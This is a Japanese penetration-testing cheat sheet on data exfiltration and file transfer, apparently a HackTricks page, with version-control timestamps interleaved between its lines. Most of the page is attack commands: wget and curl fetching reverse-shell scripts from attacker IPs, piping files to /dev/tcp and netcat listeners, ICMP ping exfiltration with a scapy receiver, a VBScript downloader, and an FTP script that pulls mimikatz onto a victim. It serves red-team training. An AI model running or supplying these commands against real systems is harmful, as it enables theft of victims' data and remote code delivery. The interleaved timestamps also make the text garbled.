2024-02-05 20:22:21 +00:00
# 情報の外部への持ち出し
2022-04-28 16:01:33 +00:00
< details >
2024-02-05 20:22:21 +00:00
< summary > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > を通じて、ゼロからヒーローまでAWSハッキングを学ぶ< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-05 20:22:21 +00:00
HackTricks をサポートする他の方法:
2023-12-30 22:56:27 +00:00
2024-02-05 20:22:21 +00:00
* **HackTricks で企業を宣伝したい**または**HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS& HackTricksのグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )で**フォロー**する。
* **ハッキングテクニックを共有するために、PRを** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) **および** [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) **のGitHubリポジトリに提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2023-09-03 01:45:18 +00:00
< figure > < img src = "/.gitbook/assets/image (675).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-02-05 20:22:21 +00:00
最も重要な脆弱性を見つけて修正を迅速化します。Intruder は攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリケーション、クラウドシステムまでの技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
2022-06-28 10:36:33 +00:00
2023-09-03 01:45:18 +00:00
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks& utm_source=referral" %}
2022-04-28 16:01:33 +00:00
2023-09-03 01:45:18 +00:00
***
2023-06-14 00:31:26 +00:00
2024-02-05 20:22:21 +00:00
## 情報を外部に持ち出すための一般的にホワイトリストに登録されているドメイン
2023-06-14 00:31:26 +00:00
2024-02-05 20:22:21 +00:00
Misskey で濫用される可能性のある一般的にホワイトリストに登録されているドメインを見つけるには、[https://lots-project.com/](https://lots-project.com/) をチェックしてください
2023-09-03 01:45:18 +00:00
2024-02-05 20:22:21 +00:00
## Base64 をコピー&ペースト
2020-07-15 15:43:14 +00:00
2022-07-21 20:01:55 +00:00
**Linux**
2020-07-15 15:43:14 +00:00
```bash
base64 -w0 < file > #Encode file
base64 -d file #Decode file
```
2022-07-21 20:01:55 +00:00
**Windows**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
```
2023-03-15 12:03:23 +00:00
## HTTP
2020-07-15 15:43:14 +00:00
2022-07-21 20:01:55 +00:00
**Linux**
2020-07-15 15:43:14 +00:00
```bash
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD
```
2022-07-21 20:01:55 +00:00
**Windows**
2020-07-15 15:43:14 +00:00
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
2023-07-07 23:42:27 +00:00
### ファイルのアップロード
2020-07-15 15:43:14 +00:00
2023-03-28 10:15:00 +00:00
* [**SimpleHttpServerWithFileUploads** ](https://gist.github.com/UniIsland/3346170 )
2023-11-05 17:06:24 +00:00
* [**SimpleHttpServer printing GET and POSTs (also headers)** ](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149 )
* Pythonモジュール [uploadserver ](https://pypi.org/project/uploadserver/ ):
2023-03-15 12:03:23 +00:00
```bash
# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
2023-07-07 23:42:27 +00:00
# With basic auth:
2023-03-15 12:03:23 +00:00
# python3 -m uploadserver --basic-auth hello:world
2020-07-15 15:43:14 +00:00
2023-03-15 12:03:23 +00:00
# Send a file
2023-07-07 23:42:27 +00:00
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
2023-03-15 12:03:23 +00:00
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
```
2023-07-07 23:42:27 +00:00
### **HTTPSサーバー**
2021-09-07 12:22:24 +00:00
```python
# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
2021-09-07 13:32:20 +00:00
# https://localhost:443
2021-09-07 12:22:24 +00:00
2022-05-01 12:41:36 +00:00
### PYTHON 2
2021-09-07 12:22:24 +00:00
import BaseHTTPServer, SimpleHTTPServer
import ssl
2021-09-07 13:32:20 +00:00
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
2021-09-07 12:22:24 +00:00
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
2022-05-01 12:41:36 +00:00
###
2022-02-02 14:59:07 +00:00
2022-05-01 12:41:36 +00:00
### PYTHON3
2022-02-02 14:59:07 +00:00
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()
2022-05-01 12:41:36 +00:00
###
2022-02-02 14:59:07 +00:00
2022-05-01 12:41:36 +00:00
### USING FLASK
2022-02-02 14:59:07 +00:00
from flask import Flask, redirect, request
from urllib.parse import quote
2023-07-07 23:42:27 +00:00
app = Flask(__name__)
@app .route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
2022-05-01 12:41:36 +00:00
###
2021-09-07 12:22:24 +00:00
```
2023-03-15 12:03:23 +00:00
## FTP
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
### FTPサーバー( Python)
2020-07-15 15:43:14 +00:00
```bash
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
```
2024-02-05 20:22:21 +00:00
### FTPサーバー( NodeJS)
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
```
2024-02-05 20:22:21 +00:00
### FTPサーバー( pure-ftp)
2020-07-15 15:43:14 +00:00
```bash
apt-get update & & apt-get install pure-ftp
```
```bash
#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
2023-07-07 23:42:27 +00:00
### **Windows** クライアント
2020-07-15 15:43:14 +00:00
```bash
#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
```
2023-09-03 01:45:18 +00:00
< figure > < img src = "/.gitbook/assets/image (675).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-06-28 10:36:33 +00:00
2024-02-05 20:22:21 +00:00
最も重要な脆弱性を見つけて、より速く修正できるようにします。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリやクラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
2023-09-03 01:45:18 +00:00
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks& utm_source=referral" %}
***
2022-06-28 10:36:33 +00:00
2023-03-15 12:03:23 +00:00
## SMB
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
Kaliをサーバーとして
2020-07-15 15:43:14 +00:00
```bash
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
```
2024-02-05 20:22:21 +00:00
または、Sambaを使用してSMB共有を作成します:
2020-07-15 15:43:14 +00:00
```bash
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
2023-07-07 23:42:27 +00:00
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
2020-07-15 15:43:14 +00:00
#Start samba
service smbd restart
```
2024-02-05 20:22:21 +00:00
## Exfiltration
### Exfiltration Techniques
Exfiltration techniques are used to **steal** data from a target network. Once an attacker has gained access to a network, they will often need to exfiltrate data without being detected. There are several common exfiltration techniques:
- **Compression**: Data is compressed before exfiltration to reduce its size and avoid detection.
- **Encryption**: Data is encrypted to prevent detection by security tools.
- **Steganography**: Data is hidden within other files to avoid detection.
- **Traffic manipulation**: Attackers manipulate network traffic to exfiltrate data without being detected.
- **DNS tunneling**: Data is exfiltrated using DNS requests to avoid detection.
### Exfiltration Tools
There are several tools available to help with data exfiltration:
- **Netcat**: A versatile networking utility that can be used for data transfer.
- **Wget**: A command-line utility for downloading files.
- **Curl**: Another command-line utility for transferring data with URLs.
- **FTP**: File Transfer Protocol can be used to exfiltrate data to an external server.
- **SCP**: Secure Copy Protocol can securely transfer files between hosts.
- **Rsync**: A utility for efficiently transferring and synchronizing files between systems.
By using these exfiltration techniques and tools, attackers can successfully steal data from a target network without being detected.
2020-07-15 15:43:14 +00:00
```bash
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
```
2023-03-15 12:03:23 +00:00
## SCP
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
攻撃者はSSHdを実行している必要があります。
2020-07-15 15:43:14 +00:00
```bash
2023-07-07 23:42:27 +00:00
scp < username > @< Attacker_IP > :< directory > /< filename >
2020-07-15 15:43:14 +00:00
```
2023-03-15 12:03:23 +00:00
## SSHFS
2022-07-06 10:22:29 +00:00
2024-02-05 20:22:21 +00:00
被害者がSSHを持っている場合、攻撃者は被害者から攻撃者にディレクトリをマウントできます。
2022-07-06 10:22:29 +00:00
```bash
sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions < Target username > @< Target IP address > :< Full path to folder > / /mnt/sshfs/
```
2023-03-15 12:03:23 +00:00
## NC
2024-02-05 20:22:21 +00:00
### Data Exfiltration
#### Description
The `nc` command, short for netcat, is a versatile tool that can be used for data exfiltration. It allows for reading and writing data across network connections, making it a valuable asset during a penetration test.
#### Usage
To exfiltrate data using `nc` , you can set up a listener on the receiving end and send data from the target machine to the listener. Here is an example of how to send a file using `nc` :
On the receiving end:
```bash
nc -lvp < PORT > > received_file
```
On the target machine:
```bash
nc < RECEIVING_IP > < PORT > < file_to_send
```
#### Considerations
- Ensure that the port you choose is open and accessible.
- Encrypt the data if necessary to prevent interception.
- Be cautious when using `nc` as it can be detected by intrusion detection systems.
2020-07-15 15:43:14 +00:00
```bash
nc -lvnp 4444 > new_file
nc -vn < IP > 4444 < exfil_file
```
2023-12-30 22:56:27 +00:00
## /dev/tcp
2023-07-07 23:42:27 +00:00
2024-02-05 20:22:21 +00:00
### 攻撃対象からファイルをダウンロード
2020-07-15 15:43:14 +00:00
```bash
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
```
2024-02-05 20:22:21 +00:00
### 被害者へのファイルアップロード
2020-07-15 15:43:14 +00:00
```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/10.10.10.10/4444
cat < & 6 > file.txt
```
2024-02-05 20:22:21 +00:00
感謝 ** @BinaryShadow \_**
2020-07-15 15:43:14 +00:00
2023-12-30 22:56:27 +00:00
## **ICMP**
2020-07-15 15:43:14 +00:00
```bash
2022-09-13 11:57:23 +00:00
# To exfiltrate the content of a file via pings you can do:
2020-07-15 15:43:14 +00:00
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line < IP attacker > ; done
2021-10-30 12:23:41 +00:00
#This will 4bytes per ping packet (you could probably increase this until 16)
2020-07-15 15:43:14 +00:00
```
```python
from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
2023-07-07 23:42:27 +00:00
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")
2020-07-15 15:43:14 +00:00
sniff(iface="tun0", prn=process_packet)
```
2023-03-15 12:03:23 +00:00
## **SMTP**
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
SMTPサーバーにデータを送信できる場合、Pythonを使用してデータを受信するSMTPを作成できます:
2020-07-15 15:43:14 +00:00
```bash
sudo python -m smtpd -n -c DebuggingServer :25
```
2023-03-15 12:03:23 +00:00
## TFTP
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
XPおよび2003ではデフォルトで有効( 他のOSではインストール時に明示的に追加する必要がある)
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
Kaliでは、**TFTPサーバーを起動**します:
2020-07-15 15:43:14 +00:00
```bash
#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp
```
2024-02-05 20:22:21 +00:00
**PythonでのTFTPサーバー:**
2020-07-15 15:43:14 +00:00
```bash
pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p < PORT > < IFACE > < FOLDER >
```
2024-02-05 20:22:21 +00:00
**被害者**で、Kaliサーバーに接続します:
2020-07-15 15:43:14 +00:00
```bash
tftp -i < KALI-IP > get nc.exe
```
2023-03-15 12:03:23 +00:00
## PHP
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
PHPのワンライナーを使用してファイルをダウンロードします:
2020-07-15 15:43:14 +00:00
```bash
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?> " > down2.php
```
2023-03-15 12:03:23 +00:00
## VBScript
2024-02-05 20:22:21 +00:00
Visual Basic Script (VBScript) は、Microsoft Windows 環境で広く使用されているスクリプト言語です。VBScript を使用して、ファイルをエクスフィルトレーションする方法の一例を以下に示します。
2023-07-07 23:42:27 +00:00
```bash
Attacker> python -m SimpleHTTPServer 80
```
**被害者**
2020-07-15 15:43:14 +00:00
```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```
```bash
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
2023-03-15 12:03:23 +00:00
## Debug.exe
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
これはWindows 32ビットマシンで機能するクレイジーなテクニックです。アイデアは`debug.exe`プログラムを使用することです。これはデバッガのようにバイナリを検査するために使用されます。しかし、16進数から再構築することもできます。したがって、バイナリ( 例: `netcat`) を16進数に分解し、それを侵害されたマシン上のファイルに貼り付け、`debug.exe`で組み立てるというアイデアです。
2020-07-15 15:43:14 +00:00
2024-02-05 20:22:21 +00:00
`Debug.exe` は64 kbしか組み立てられません。そのため、それよりも小さいファイルを使用する必要があります。さらに圧縮するためにupxを使用できます。それでは、やってみましょう:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
upx -9 nc.exe
```
2024-02-05 20:22:21 +00:00
今はたった29 kbしかありません。完璧です。では、これを分解してみましょう:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
wine exe2bat.exe nc.exe nc.txt
```
2023-03-15 12:03:23 +00:00
## DNS
2021-04-01 12:07:45 +00:00
2022-06-28 10:36:33 +00:00
* [https://github.com/62726164/dns-exfil ](https://github.com/62726164/dns-exfil )
2022-04-28 16:01:33 +00:00
2023-09-03 01:45:18 +00:00
< figure > < img src = "/.gitbook/assets/image (675).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-02-05 20:22:21 +00:00
最も重要な脆弱性を見つけて修正を迅速化します。Intruderは攻撃面を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリケーション、クラウドシステムまでの技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
2023-09-03 01:45:18 +00:00
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks& utm_source=referral" %}
2022-06-28 10:36:33 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-02-05 20:22:21 +00:00
< summary > < strong > ゼロからヒーローまでのAWSハッキングを学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-05 20:22:21 +00:00
HackTricksをサポートする他の方法:
2023-12-30 22:56:27 +00:00
2024-02-05 20:22:21 +00:00
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS& HackTricksスワッグ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**をフォローする。**
* **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
2022-04-28 16:01:33 +00:00
< / details >